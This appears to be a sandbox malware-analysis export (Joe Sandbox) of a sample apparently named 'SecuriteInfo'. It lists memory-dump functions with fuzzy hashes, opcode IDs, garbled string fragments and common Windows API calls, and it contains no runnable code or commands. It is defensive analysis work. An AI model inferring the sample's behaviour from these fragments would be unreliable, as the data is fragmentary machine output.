                                    • Instruction Fuzzy Hash: B0625E35A00119DFCB04DFA9D984AAEBBB2BF88711B15C56DE8059B364DB35EC42CF90

                                    Control-flow Graph
                                    • Rendered graph omitted from the text export (blocks were coloured Executed / Not Executed); entry block 85c9dcf-85c9dd0, basic blocks span 85c9d72-85ca113, no named API calls.
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: l.]q$l.]q$r
                                    • API String ID: 0-1833449037
                                    • Opcode ID: f7bdc583efabda5aa55d405eb6ae2259f75eb89d3420eae9d65f600885f59e79
                                    • Instruction ID: 3fc743c36d99aebd5bede70486e8e7825ee4f442424b7f17cd7f0928e36a0044
                                    • Opcode Fuzzy Hash: f7bdc583efabda5aa55d405eb6ae2259f75eb89d3420eae9d65f600885f59e79
                                    • Instruction Fuzzy Hash: 94B1F175904294CFC7018FADD8406A9FFF1BF46322F1489AFE456EB692C634C990CB52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: fbq$ fbq$ fbq$ fbq$ fbq$ fbq$ fbq$ fbq$ fbq$Te]q$Te]q$Te]q$XX]q$XX]q$XX]q$XX]q$XX]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                    • API String ID: 0-3260208676
                                    • Opcode ID: fe1f5e8df4e2ba2be1afbc4df91b2562c125d6072cb199b32d4df92a344f1206
                                    • Instruction ID: 8644b215405a67f75e75b8c85bf0b6f8622ecba167edd78dc572b7d622927aa2
                                    • Opcode Fuzzy Hash: fe1f5e8df4e2ba2be1afbc4df91b2562c125d6072cb199b32d4df92a344f1206
                                    • Instruction Fuzzy Hash: 01328234A00258CFDB14DFE9C895AAD7BB2BF44352F24496ED842AB395CB709C46CF51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$$]q$$]q
                                    • API String ID: 0-2016595432
                                    • Opcode ID: a10f28dbc813a654cf10e2008085ecfc1db002601c39aa185373a6fa033c4783
                                    • Instruction ID: 04095f1affe09472a677889a13531ece9f938e156d35db9d672fe0b06bfc5c72
                                    • Opcode Fuzzy Hash: a10f28dbc813a654cf10e2008085ecfc1db002601c39aa185373a6fa033c4783
                                    • Instruction Fuzzy Hash: 18D19034B40205DFDB049FACD859BAD7BA2BB8C711F20842DE906AB784DE749C42CF95

                                    Control-flow Graph
                                    • Rendered graph omitted from the text export (blocks were coloured Executed / Not Executed); entry block 85c8dea-85c8dee, basic blocks span 85c8dca-85c9211, call at 85c8e72 resolved to 85c9dcf or 85c9ea9.
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: fbq$ fbq$Te]q$XX]q$$]q$$]q$$]q$$]q
                                    • API String ID: 0-1505870616
                                    • Opcode ID: c8116be86c7ac54bcb9a7b4f815593787a128f1a0797bdb966a20338fdafcad6
                                    • Instruction ID: 983f2d351db8d5abb27e13203df3132e4c2f49b8d46480a3605b04d977fe22e9
                                    • Opcode Fuzzy Hash: c8116be86c7ac54bcb9a7b4f815593787a128f1a0797bdb966a20338fdafcad6
                                    • Instruction Fuzzy Hash: 48917F30A04218DFDB158FD8C945ABDBBB2FF45752F1589AEE502AB2A5C7709C42CF41

                                    Control-flow Graph
                                    • Rendered graph omitted from the text export (blocks were coloured Executed / Not Executed); entry block 85c8dc5, basic blocks span 85c8dc5-85c9211, call at 85c8e72 resolved to 85c9dcf or 85c9ea9.
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: fbq$ fbq$Te]q$XX]q$$]q$$]q$$]q$$]q
                                    • API String ID: 0-1505870616
                                    • Opcode ID: 98adf8583fa2804c96219a0f4f993449de9bb3393588c4aaf074a3e0157e444e
                                    • Instruction ID: bbe99b04c5a529145fb025194ad244bd01d92b937803a71f6e0ed00f768e1510
                                    • Opcode Fuzzy Hash: 98adf8583fa2804c96219a0f4f993449de9bb3393588c4aaf074a3e0157e444e
                                    • Instruction Fuzzy Hash: 3D816030A04218DFDB15CFD8C944A7DBBB2FB44752F1589AEE502AB295C7709C42CF51

                                    Control-flow Graph
                                    • Rendered graph omitted from the text export (blocks were coloured Executed / Not Executed); entry block 85c2c30-85c2c5a, basic blocks span 85c2c30-85c30f5, call at 85c2ce5 resolved to 85c30f8 or 85c3108, call at 85c2e87 resolved to 85c34e7, 85c3270 or 85c3280.
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (o]q$(o]q$,aq$,aq$Haq$d8bq
                                    • API String ID: 0-380147655
                                    • Opcode ID: 8da7aeee5606d74192af5add170b9271cec972ea0c4e6a9736ff7510b17a0d34
                                    • Instruction ID: c0b83574e805f19042373fbfeba3d12e5d8db9f3296c786118349e7c704d547e
                                    • Opcode Fuzzy Hash: 8da7aeee5606d74192af5add170b9271cec972ea0c4e6a9736ff7510b17a0d34
                                    • Instruction Fuzzy Hash: 6CC13630B102199FCB14DFA9D958AAE7BB6BF88701F14846DE806E73A5DB34DC41CB91

                                    Control-flow Graph
                                    • Rendered graph omitted from the text export (blocks were coloured Executed / Not Executed); entry block 133d474-133d507, basic blocks span 133d474-133d645, in order: GetCurrentProcess, GetCurrentThread, GetCurrentProcess, call 133d648, GetCurrentThreadId.
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 0133D4F6
                                    • GetCurrentThread.KERNEL32 ref: 0133D533
                                    • GetCurrentProcess.KERNEL32 ref: 0133D570
                                    • GetCurrentThreadId.KERNEL32 ref: 0133D5C9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID:
                                    • API String ID: 2063062207-0
                                    • Opcode ID: 67655f8b5dafbfb9ee8376fe8380b8634542b063bd45dc36253cd88354b8459a
                                    • Instruction ID: c2f201203f66ca38637acc48ca86d57a3bec40c1d32dfaeb6117126978282b53
                                    • Opcode Fuzzy Hash: 67655f8b5dafbfb9ee8376fe8380b8634542b063bd45dc36253cd88354b8459a
                                    • Instruction Fuzzy Hash: B7513BB0900349CFDB18DFA9D548B9EBBF1FF88314F208459E019AB260D7785948CF66

                                    Control-flow Graph
                                    • Rendered graph omitted from the text export (blocks were coloured Executed / Not Executed); entry block 133d478-133d507, basic blocks span 133d478-133d645, in order: GetCurrentProcess, GetCurrentThread, GetCurrentProcess, call 133d648, GetCurrentThreadId.
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 0133D4F6
                                    • GetCurrentThread.KERNEL32 ref: 0133D533
                                    • GetCurrentProcess.KERNEL32 ref: 0133D570
                                    • GetCurrentThreadId.KERNEL32 ref: 0133D5C9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID:
                                    • API String ID: 2063062207-0
                                    • Opcode ID: 23b409725a6bea64c6f7339bbff10e5a492c6809403c3c8a2490007cd9c7a847
                                    • Instruction ID: 58017be3837c73d85feb9597dae7c4c501a06e2371d35c1c3f8bd0b756e974e7
                                    • Opcode Fuzzy Hash: 23b409725a6bea64c6f7339bbff10e5a492c6809403c3c8a2490007cd9c7a847
                                    • Instruction Fuzzy Hash: C1512BB0900349CFDB18DFA9D548B9EBBF5FF88314F208459E019AB260D7785948CF66

                                    Control-flow Graph
                                    • Rendered graph omitted from the text export (blocks were coloured Executed / Not Executed); entry block 85c8240-85c82a4, basic blocks span 85c8240-85c8362, a chain of seven conditional checks each branching to 85c8352-85c8362, with the final block 85c831b-85c8351 calling 85c7280.
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LR]q$U$$]q$$]q
                                    • API String ID: 0-3846951357
                                    • Opcode ID: 555680dad41860e7cbc7506f35ca4543a8f616662732fa469bb792aef3a1bf6e
                                    • Instruction ID: bb0c22ea51472c717f68af55864eb5a6c41a07c7d18c1b2082ad1d1b0f7aa381
                                    • Opcode Fuzzy Hash: 555680dad41860e7cbc7506f35ca4543a8f616662732fa469bb792aef3a1bf6e
                                    • Instruction Fuzzy Hash: 1D310270901208DFCB14DFA8D588A9DBBF1FF04706F18D5ADD0196B622D735DA88CB45

                                    Control-flow Graph
                                    • Rendered graph omitted from the text export (blocks were coloured Executed / Not Executed); entry block 85c7b4c, basic blocks span 85c7b3d-85c7f0e, call at 85c7d00 resolved to 85cc4e4, 85cd870 or 85cd880, call at 85c7d08 resolved to 85ce5b8 or 85ce5a8, call at 85c7dd2 resolved to 85cf019 or 85cf030.
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $]q$$]q
                                    • API String ID: 0-127220927
                                    • Opcode ID: 088f3c8b9e5472ddb454d591eb818878490255fd539040226e4739113073bf5a
                                    • Instruction ID: fdeee51f0f3d12f6b5a8b8e6373aec30e41abe5badccbb545a2cda56fac688e6
                                    • Opcode Fuzzy Hash: 088f3c8b9e5472ddb454d591eb818878490255fd539040226e4739113073bf5a
                                    • Instruction Fuzzy Hash: 56518634B40219DFDB149FB8D859BAD7BB2BB4C712F208429E902A7794DE749C41CF94

                                    Control-flow Graph
                                    • Rendered graph omitted from the text export (blocks were coloured Executed / Not Executed); entry block 85c7b33, basic blocks span 85c7b33-85c7f0e, call at 85c7d00 resolved to 85cc4e4, 85cd870 or 85cd880, call at 85c7d08 resolved to 85ce5b8 or 85ce5a8, call at 85c7dd2 resolved to 85cf019 or 85cf030.
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $]q$$]q
                                    • API String ID: 0-127220927
                                    • Opcode ID: 371b3c16d7955df2eb8e918a9f84cc19b86e48d1a7599707be653f21c430155d
                                    • Instruction ID: 483a46d5929b6dec690269c08c10d7d6c3d627f5a28056bcd6ba287b51ca8989
                                    • Opcode Fuzzy Hash: 371b3c16d7955df2eb8e918a9f84cc19b86e48d1a7599707be653f21c430155d
                                    • Instruction Fuzzy Hash: C9519534B40219DFDB148FB8D459BAD7BB2BB8C711F208429E902A7780DE749C41CFA4
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0133B446
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: d46a343fee073827518d574cb28242c92f4fd7b5ed566acbc602b8d84b8640e6
                                    • Instruction ID: 62375047e396067cd4c3d72687c885836828d734ddce057b91d0b45fced2b24c
                                    • Opcode Fuzzy Hash: d46a343fee073827518d574cb28242c92f4fd7b5ed566acbc602b8d84b8640e6
                                    • Instruction Fuzzy Hash: F6814470A00B458FDB24DF6AD0407AABBF5FF88304F008A2DD48ADBA54D775E949CB95
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05581E02
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2060061163.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5580000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: 338d3c96db543e2d05204d7538645e6d49e892f04d238cd23b3ccd32ce734a57
                                    • Instruction ID: 29855df65df1b916974719c3e0e1e948b7d0df3a7ae0d09d6e24c0d47160887d
                                    • Opcode Fuzzy Hash: 338d3c96db543e2d05204d7538645e6d49e892f04d238cd23b3ccd32ce734a57
                                    • Instruction Fuzzy Hash: 2851C1B1D10749AFDB14DFA9C884ADEBFB5BF48310F24812AE819AB210D7759885CF91
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05581E02
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2060061163.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5580000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: af797a426fc25e9e3f0efacd4e9ef28f5399fafce67481fb41bec78b2d9c288c
                                    • Instruction ID: cf5792593edb39f9e5820cddd169936f90e719590a59993b253712d9e4ece976
                                    • Opcode Fuzzy Hash: af797a426fc25e9e3f0efacd4e9ef28f5399fafce67481fb41bec78b2d9c288c
                                    • Instruction Fuzzy Hash: 3641C0B1D007499FDB14DFA9C884ADEBFB5BF48310F24812AE819AB250D774A885CF90
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 01335F41
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: 056fe54aa7c5a4c9fe40c8d41ef51cf85091f17379c2c4a53c54f64be177663d
                                    • Instruction ID: 942ae7eb6fa6cf2585361db43cad1428d87aea2cb53f63e8204e0c2bfa90611a
                                    • Opcode Fuzzy Hash: 056fe54aa7c5a4c9fe40c8d41ef51cf85091f17379c2c4a53c54f64be177663d
                                    • Instruction Fuzzy Hash: 2D41E2B0C0071DCEDB24DFA9C944BDDBBB5BF89308F20846AD408AB255DB75694ACF91
                                    APIs
                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 05584381
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2060061163.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5580000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: CallProcWindow
                                    • String ID:
                                    • API String ID: 2714655100-0
                                    • Opcode ID: 2b169f9279e89309b6e6a2351c5de4f16224c195950c72b991208803079314c3
                                    • Instruction ID: e08582b24d1f35c5c5b0589defc1ebee7198d3b8a0649ed0269b69b2e4d07e70
                                    • Opcode Fuzzy Hash: 2b169f9279e89309b6e6a2351c5de4f16224c195950c72b991208803079314c3
                                    • Instruction Fuzzy Hash: 434129B4900249CFCB14DF99C448AAEFBF5FF88314F25C859D919AB321D774A841CBA0
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 01335F41
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: e1e7690c8a84da532af00de5a6842c5043f34ca7a3e179ed95b0143f4ad22cbb
                                    • Instruction ID: f1189833cdbad34e904f9a7d8c0337f5abbdf30b0917f18b30af65eb7e49bc50
                                    • Opcode Fuzzy Hash: e1e7690c8a84da532af00de5a6842c5043f34ca7a3e179ed95b0143f4ad22cbb
                                    • Instruction Fuzzy Hash: F441D2B0C0071DCBDB24DFA9C844B9DBBF6BF89304F20846AD408AB255DB756949CF91
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0133D747
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 6851ed883ca641cac3104dce7ff049282580373c052e2b5efaaa5ffb09636851
                                    • Instruction ID: 9336dd257c17a4fa3d9767618d519474d65ef2ed5704676aa108ada2ccc72c65
                                    • Opcode Fuzzy Hash: 6851ed883ca641cac3104dce7ff049282580373c052e2b5efaaa5ffb09636851
                                    • Instruction Fuzzy Hash: 8E21E3B5D003489FDB10CFAAD584AEEBBF5FB49320F14801AE918A3250C379A944CF65
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0133D747
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 02e9c0545cabb1da2f770f5dac946988a36b0c80c9f192f5421d0a7f4e591f0f
                                    • Instruction ID: f62600849e419fa0434ba4a3ec4308bdf22d7f1b4b1291c289de6f87aae7f51d
                                    • Opcode Fuzzy Hash: 02e9c0545cabb1da2f770f5dac946988a36b0c80c9f192f5421d0a7f4e591f0f
                                    • Instruction Fuzzy Hash: CA21D3B59002489FDB10CFAAD984ADEFFF9FB48310F14841AE918A3350D378A944CFA5
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0133B4C1,00000800,00000000,00000000), ref: 0133B6D2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 81cb24926cf186426db665bd409210d4acbe49b513b13bb89b0638e4db6ce3cc
                                    • Instruction ID: f024bba23662763dd6dfb81e1abdd284b1fc0b895c39930cd96de7afaebc71ec
                                    • Opcode Fuzzy Hash: 81cb24926cf186426db665bd409210d4acbe49b513b13bb89b0638e4db6ce3cc
                                    • Instruction Fuzzy Hash: 312114B6C003498FDB10CF9AD444AEEFBF4EB89324F10842ED919A7210C379A945CFA5
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0133B4C1,00000800,00000000,00000000), ref: 0133B6D2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 09fb0105db743a0a5c556c0367bbaac900adf90a32a38e4c7d7920e57deec973
                                    • Instruction ID: 9f0bff35672ba8ad9c48fd774451e461b59a5b6517ce545e67a9be37857e90d6
                                    • Opcode Fuzzy Hash: 09fb0105db743a0a5c556c0367bbaac900adf90a32a38e4c7d7920e57deec973
                                    • Instruction Fuzzy Hash: F21114B68003488FDB10DF9AD444B9EFBF4EB88324F10842AD519A7210C379A944CFA5
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07F5993D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2062277673.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07ED0000, based on PE: true
                                    • Associated: 00000000.00000002.2062036493.0000000007ED0000.00000004.08000000.00040000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ed0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID:
                                    • API String ID: 410705778-0
                                    • Opcode ID: 6ab927f87e9048a929ecfb8c7ae024412ceb1931610bd7b3c00ca3656f7383e4
                                    • Instruction ID: 7d9f8f7762486b6edeae94e8d97c574ba169ac1ed8a49ed4bf1e97dda533bc35
                                    • Opcode Fuzzy Hash: 6ab927f87e9048a929ecfb8c7ae024412ceb1931610bd7b3c00ca3656f7383e4
                                    • Instruction Fuzzy Hash: 591103B5800349DFDB10DF9AD449BDEBBF8FB49310F14841AEA18A7240C3B9A944CFA1
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0133B446
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 0f6b24093d0cea32cebe1e68614fe44bafaab6df5263dfdbc9ca997f1745ed53
                                    • Instruction ID: c3c1185be481a2c45d305755bc40201136201b49c7a2622964cca2e9054fa84b
                                    • Opcode Fuzzy Hash: 0f6b24093d0cea32cebe1e68614fe44bafaab6df5263dfdbc9ca997f1745ed53
                                    • Instruction Fuzzy Hash: 2D11DFB6C006498FDB10DF9AD444B9EFBF4AF89314F10841AD519B7210C379A545CFA5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Te]q
                                    • API String ID: 0-52440209
                                    • Opcode ID: 4fb175650687600dfc019d4b029569132cae4fbcda3a02aec072f220cc94b153
                                    • Instruction ID: 9e7ed55e15590ca779237f729b6b3ed504a870946caccc63dd07847f4f192f42
                                    • Opcode Fuzzy Hash: 4fb175650687600dfc019d4b029569132cae4fbcda3a02aec072f220cc94b153
                                    • Instruction Fuzzy Hash: 1451B031B002068FCB15DBB9D88496FBBF6FFC5221715896DE459D7350EB309D068BA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: r
                                    • API String ID: 0-621588783
                                    • Opcode ID: fe60aaed1ea682eb7b3fdc257ecaee4dce17cb653860c407abe2115ac98f8de8
                                    • Instruction ID: ebc4e2dd62f66b7399a864432f9be59e76a121e119b64e5d05af03a3a4ad0ae1
                                    • Opcode Fuzzy Hash: fe60aaed1ea682eb7b3fdc257ecaee4dce17cb653860c407abe2115ac98f8de8
                                    • Instruction Fuzzy Hash: F0319A71804289CFCB11CFA9C8806AAFFF5BF85312F14866EE569E7292D7349A11CF51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Te]q
                                    • API String ID: 0-52440209
                                    • Opcode ID: 9319c6eb944b88257967ec88703d2e7dd08967f9eaffb0e55ce36087f2171951
                                    • Instruction ID: 9823a5111f3813e6183ad3d75c6bf92ca39c4eab3d58d497585b95a5050169ff
                                    • Opcode Fuzzy Hash: 9319c6eb944b88257967ec88703d2e7dd08967f9eaffb0e55ce36087f2171951
                                    • Instruction Fuzzy Hash: B5115B72E0020A8FCB54EFE8D4416EEB7F6BF98652B14446DC049E7214EB358902DFA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Te]q
                                    • API String ID: 0-52440209
                                    • Opcode ID: d58a439255699968d0cb7176f16f02b8b9f915163c62418ab8e2ed276a08b5b7
                                    • Instruction ID: adefb6476b4d81838a4872531bc7b452802932d605e6c1f5fa40d64a37d548e3
                                    • Opcode Fuzzy Hash: d58a439255699968d0cb7176f16f02b8b9f915163c62418ab8e2ed276a08b5b7
                                    • Instruction Fuzzy Hash: AB111C31F0020A8FCB54EFA999115EEB7F6BFC8651B60407DC50AE7244EB358E02DBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: U
                                    • API String ID: 0-3372436214
                                    • Opcode ID: dcfa75870b5389d7f6db8b4f879905df975fe02788a46248a4a92a4ade959fb4
                                    • Instruction ID: 68041bde46bfb1ab68299719dd506f38e5a9cefabcc5751399d2726179d6d556
                                    • Opcode Fuzzy Hash: dcfa75870b5389d7f6db8b4f879905df975fe02788a46248a4a92a4ade959fb4
                                    • Instruction Fuzzy Hash: 3BE0CD30284349EFE7600F909C19F3536CDBB81B15F24457CED98595D1C7A15400CB06
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: "b
                                    • API String ID: 0-3762279112
                                    • Opcode ID: 2184c6745f87a3825b8ca13e526bcd52b8e22534df585d5c2320415d039a638a
                                    • Instruction ID: 9ef9369333a8434023171b129b73e19299e04f2d1988c6b8e6b62b495e35e1b5
                                    • Opcode Fuzzy Hash: 2184c6745f87a3825b8ca13e526bcd52b8e22534df585d5c2320415d039a638a
                                    • Instruction Fuzzy Hash: 10D012361002089E8B41EEE5E800D56B7DCBB647017008436E508C7520E721E925EB51
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 53088833f8f8fcec0191ea9a2947a85c6c28b7efd8708a00164676714432e9a7
                                    • Instruction ID: 35c1afd915fa6e6d6b2fd9666ba72920c5ab9e8f067a99ff75d3ed086942d29a
